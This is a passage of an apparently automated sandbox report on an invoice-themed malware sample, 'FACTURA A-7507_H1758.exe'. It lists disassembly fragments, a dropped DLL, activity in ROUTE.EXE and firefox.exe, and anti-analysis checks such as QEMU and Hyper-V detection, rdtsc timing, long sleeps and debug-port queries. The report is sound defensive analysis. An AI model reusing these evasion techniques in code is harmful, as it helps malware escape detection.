    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A5F80F push FFFFFFA1h; ret 3_2_03A5F811
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A616E8 push ds; iretd 3_2_03A616F2
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A6858F push E20CA858h; ret 3_2_03A68594
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A61C87 push esp; ret 3_2_03A61CA5
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034321AD pushad ; retf 0004h4_2_0343223F
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034608CD push ecx; mov dword ptr [esp], ecx4_2_034608D6
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034397A1 push es; iretd 4_2_034397A8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331C334 push ecx; retf 4_2_0331C33B
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331639D push edi; retf 4_2_0331639E
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331C23F push edx; retf 4_2_0331C240
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_033252C2 push eax; ret 4_2_033252C4
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331550E push edx; iretd 4_2_03315522
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_033154ED push edx; iretd 4_2_03315522
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331CB12 pushfd ; iretd 4_2_0331CB13
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FB7F push esp; iretd 4_2_0331FB80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03315AA6 push FFFFFFE7h; iretd 4_2_03315AB3
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03315A8E push FFFFFFE7h; iretd 4_2_03315AB3
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F9F8 pushfd ; retf 4_2_0331FA0A
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FE95 push eax; iretd 4_2_0331FE96
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile created: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeAPI/Special instruction interceptor: Address: 50B4FC1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeAPI/Special instruction interceptor: Address: 3424FC1
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D144
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D604
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D764
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D324
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D364
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D004
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8FF74
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFEDBB8D864
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.00000000005F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE`
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.0000000000636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331091274.0000000000480000.00000004.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26712246825.00000000069C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ,.C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35471763 rdtsc 2_2_35471763
    Source: C:\Windows\SysWOW64\ROUTE.EXEWindow / User API: threadDelayed 9812Jump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeAPI coverage: 0.2 %
    Source: C:\Windows\SysWOW64\ROUTE.EXEAPI coverage: 1.8 %
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780Thread sleep count: 120 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780Thread sleep count: 9812 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7780Thread sleep time: -19624000s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe TID: 5872Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
    Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331091274.0000000000480000.00000004.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26712246825.00000000069C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ,.C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30691049451.000000000115F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.00000000005F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe`
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26331628112.0000000000636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26346049216.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
    Source: firefox.exe, 00000006.00000002.26994603056.0000024235097000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeAPI call chain: ExitProcess graph end nodegraph_0-4659
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeAPI call chain: ExitProcess graph end nodegraph_0-4652
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35471763 rdtsc 2_2_35471763
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_00402E41 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,GlobalAlloc,CreateFileW,LdrInitializeThunk,0_2_00402E41
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B55F mov eax, dword ptr fs:[00000030h]2_2_3550B55F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B55F mov eax, dword ptr fs:[00000030h]2_2_3550B55F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B9567 mov eax, dword ptr fs:[00000030h]2_2_354B9567
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B502 mov eax, dword ptr fs:[00000030h]2_2_3542B502
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E550D mov eax, dword ptr fs:[00000030h]2_2_354E550D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E550D mov eax, dword ptr fs:[00000030h]2_2_354E550D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E550D mov eax, dword ptr fs:[00000030h]2_2_354E550D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35451514 mov eax, dword ptr fs:[00000030h]2_2_35451514
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35451514 mov eax, dword ptr fs:[00000030h]2_2_35451514
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35451514 mov eax, dword ptr fs:[00000030h]2_2_35451514
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35451514 mov eax, dword ptr fs:[00000030h]2_2_35451514
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35451514 mov eax, dword ptr fs:[00000030h]2_2_35451514
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35451514 mov eax, dword ptr fs:[00000030h]2_2_35451514
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov ecx, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov ecx, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF51B mov eax, dword ptr fs:[00000030h]2_2_354DF51B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35461527 mov eax, dword ptr fs:[00000030h]2_2_35461527
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546F523 mov eax, dword ptr fs:[00000030h]2_2_3546F523
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35433536 mov eax, dword ptr fs:[00000030h]2_2_35433536
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35433536 mov eax, dword ptr fs:[00000030h]2_2_35433536
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542753F mov eax, dword ptr fs:[00000030h]2_2_3542753F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542753F mov eax, dword ptr fs:[00000030h]2_2_3542753F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542753F mov eax, dword ptr fs:[00000030h]2_2_3542753F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F5C7 mov eax, dword ptr fs:[00000030h]2_2_3542F5C7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BB5D3 mov eax, dword ptr fs:[00000030h]2_2_354BB5D3
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B5E0 mov eax, dword ptr fs:[00000030h]2_2_3543B5E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B5E0 mov eax, dword ptr fs:[00000030h]2_2_3543B5E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B5E0 mov eax, dword ptr fs:[00000030h]2_2_3543B5E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B5E0 mov eax, dword ptr fs:[00000030h]2_2_3543B5E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B5E0 mov eax, dword ptr fs:[00000030h]2_2_3543B5E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B5E0 mov eax, dword ptr fs:[00000030h]2_2_3543B5E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354615EF mov eax, dword ptr fs:[00000030h]2_2_354615EF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B55E0 mov eax, dword ptr fs:[00000030h]2_2_354B55E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35469580 mov eax, dword ptr fs:[00000030h]2_2_35469580
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35469580 mov eax, dword ptr fs:[00000030h]2_2_35469580
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF582 mov eax, dword ptr fs:[00000030h]2_2_354EF582
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D7591 mov edi, dword ptr fs:[00000030h]2_2_354D7591
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546D450 mov eax, dword ptr fs:[00000030h]2_2_3546D450
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546D450 mov eax, dword ptr fs:[00000030h]2_2_3546D450
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543D454 mov eax, dword ptr fs:[00000030h]2_2_3543D454
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543D454 mov eax, dword ptr fs:[00000030h]2_2_3543D454
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543D454 mov eax, dword ptr fs:[00000030h]2_2_3543D454
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543D454 mov eax, dword ptr fs:[00000030h]2_2_3543D454
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543D454 mov eax, dword ptr fs:[00000030h]2_2_3543D454
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543D454 mov eax, dword ptr fs:[00000030h]2_2_3543D454
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF478 mov eax, dword ptr fs:[00000030h]2_2_354EF478
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF409 mov eax, dword ptr fs:[00000030h]2_2_354EF409
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B420 mov eax, dword ptr fs:[00000030h]2_2_3542B420
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B9429 mov eax, dword ptr fs:[00000030h]2_2_354B9429
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35467425 mov eax, dword ptr fs:[00000030h]2_2_35467425
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35467425 mov ecx, dword ptr fs:[00000030h]2_2_35467425
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BF42F mov eax, dword ptr fs:[00000030h]2_2_354BF42F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BF42F mov eax, dword ptr fs:[00000030h]2_2_354BF42F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BF42F mov eax, dword ptr fs:[00000030h]2_2_354BF42F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BF42F mov eax, dword ptr fs:[00000030h]2_2_354BF42F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BF42F mov eax, dword ptr fs:[00000030h]2_2_354BF42F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354CB420 mov eax, dword ptr fs:[00000030h]2_2_354CB420
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354CB420 mov eax, dword ptr fs:[00000030h]2_2_354CB420
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354ED430 mov eax, dword ptr fs:[00000030h]2_2_354ED430
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354ED430 mov eax, dword ptr fs:[00000030h]2_2_354ED430
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354514C9 mov eax, dword ptr fs:[00000030h]2_2_354514C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354514C9 mov eax, dword ptr fs:[00000030h]2_2_354514C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354514C9 mov eax, dword ptr fs:[00000030h]2_2_354514C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354514C9 mov eax, dword ptr fs:[00000030h]2_2_354514C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354514C9 mov eax, dword ptr fs:[00000030h]2_2_354514C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F4D0 mov eax, dword ptr fs:[00000030h]2_2_3545F4D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354654E0 mov eax, dword ptr fs:[00000030h]2_2_354654E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF4FD mov eax, dword ptr fs:[00000030h]2_2_354EF4FD
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354594FA mov eax, dword ptr fs:[00000030h]2_2_354594FA
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546B490 mov eax, dword ptr fs:[00000030h]2_2_3546B490
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546B490 mov eax, dword ptr fs:[00000030h]2_2_3546B490
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BD4A0 mov ecx, dword ptr fs:[00000030h]2_2_354BD4A0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BD4A0 mov eax, dword ptr fs:[00000030h]2_2_354BD4A0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BD4A0 mov eax, dword ptr fs:[00000030h]2_2_354BD4A0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E54B0 mov eax, dword ptr fs:[00000030h]2_2_354E54B0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E54B0 mov ecx, dword ptr fs:[00000030h]2_2_354E54B0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B174B mov eax, dword ptr fs:[00000030h]2_2_354B174B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B174B mov ecx, dword ptr fs:[00000030h]2_2_354B174B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35463740 mov eax, dword ptr fs:[00000030h]2_2_35463740
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546174A mov eax, dword ptr fs:[00000030h]2_2_3546174A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F75B mov eax, dword ptr fs:[00000030h]2_2_3542F75B
